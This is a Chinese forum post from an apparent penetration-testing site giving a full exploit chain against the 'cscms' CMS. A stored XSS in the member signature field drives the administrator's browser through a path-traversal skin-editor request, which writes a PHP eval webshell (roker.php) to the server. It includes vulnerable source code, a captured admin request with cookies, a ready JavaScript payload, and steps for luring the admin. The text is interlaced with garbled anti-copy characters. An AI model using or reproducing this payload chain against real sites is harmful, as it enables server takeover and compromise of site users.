| 这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题1 f$ `0 J, x/ Q' W0 p( _: q 官网已经修补了,所以重新下了源码 因为 后台登入 还需要认证码 所以 注入就没看了。) y8 e& v6 A7 a. e* ~" ? 存在 xss 漏洞文件 user/member/skin_edit.php0 l+ P% p; V Q( j3 L 本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:- L% w) P$ O* @- C" v6 l; |& z& U7 J 7 c" u/ x2 y8 d1 B6 G </span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>; j& m6 j& U' V, h0 A% ? 6 K: p) M7 s8 h! e9 x </textarea></td></tr> ( \) |+ i) N& O: W. K/ n: Y user/do.php 5 `- b& @ n$ A$ P- T if($op=='zl'){ //资料 if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) " F( R& a" c, H& t, u8 W$ k exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);')); ; m3 }" S, l8 a! d- T* \, @* K $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."', CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'- Z6 n, S* b3 v( E: R, ` Q& `- C where CS_Name='".$cscms_name."'";/ x$ ]9 s' @8 q if($db->query($sql)){ m; G0 `: L _+ P exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);')); $ c' w2 g. X3 _* D. ~ }else{ exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));+ Y: O) u% ~, E } 5 D9 O' [. [$ o 没有 过滤导致xss产生。) }" ?" |8 I+ J9 ~. X% ]; e% { 后台 看了下 很奇葩的是可以写任意格式文件。。, v; |4 l; v; Q/ S) W- Y 抓包。。 ) P$ ]7 l- S0 ?6 ?( d 本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.10 g2 T5 @& X6 f6 m1 `4 R Accept: text/html, application/xhtml+xml, */* $ v, [' D1 q# q* @3 f Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php / G, O7 `8 Z2 r( y1 c% p, I Accept-Language: zh-CN7 k) g0 o: ^, e5 V& I, e7 q6 w # d1 y# I% w$ J5 ~' c1 s User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) Content-Type: application/x-www-form-urlencoded . q& B6 f, y+ m$ q7 A Accept-Encoding: gzip, deflate( U& M. {' Z2 H, y! W 6 m- ^1 ~& [5 m3 w Host: 127.0.0.1 Content-Length: 38 % G# {3 X3 v2 h6 x" k DNT: 19 {- s. }$ K+ P5 E; @; n k9 M : Z ~% l% g6 B7 d( M' v' p Connection: Keep-Alive# X; H+ K; E1 ?; C Cache-Control: no-cache Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f655948 ]3 F( E" s P2 _4 s4 b! C name=aaa.php&content=%3Cs%3E%3Ca%25%3E ; Q. N, r* I/ ~8 o 2 E6 g5 k3 K' [; I& X9 n : C' J' ]' i& t# ] q I; o 于是 构造js如下。' y" @4 k( U2 Q! k; L 本帖隐藏的内容<script> thisTHost = top.location.hostname;! L* {( r X- Y4 q ! M& f% V+ G& J( _: x+ H! X e. u thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/"; function PostSubmit(url, data, msg) { var postUrl = url;" F3 M+ y8 u, C0 P) U9 A/ u 8 D4 d. B8 R5 D+ k4 i: _6 E: p+ J; v var postData = data; var msgData = msg; & a6 g5 F4 T9 _' M var ExportForm = document.createElement("FORM"); document.body.appendChild(ExportForm); ! Q/ Z! c: m% ^ ExportForm.method = "POST"; . C, E/ l- a# Q: j" v% B var newElement = document.createElement("input"); newElement.setAttribute("name", "name"); newElement.setAttribute("type", "hidden"); 2 R2 ?2 D4 W9 C4 c3 h7 M; F var newElement2 = document.createElement("input"); newElement2.setAttribute("name", "content"); newElement2.setAttribute("type", "hidden"); % B# v' G# [5 ?2 {+ j# ?4 q/ d ExportForm.appendChild(newElement); % }) l7 I1 ^5 ?, j ExportForm.appendChild(newElement2); newElement.value = postData; newElement2.value = msgData; ExportForm.action = postUrl; " X3 c6 L( ?* y- }9 D ExportForm.submit(); 1 L+ j: c7 O- c4 V5 a% C };" \/ f c3 |0 h4 O5 S PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>"); * _" I/ L: {$ J" i+ g- \ </script>& I2 e& y6 [5 U% k7 m 0 y" f e/ y+ I/ |3 S0 O http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入! a) G9 m$ o) X 用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)$ b% S( ]! @5 O. k6 {& Z 就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |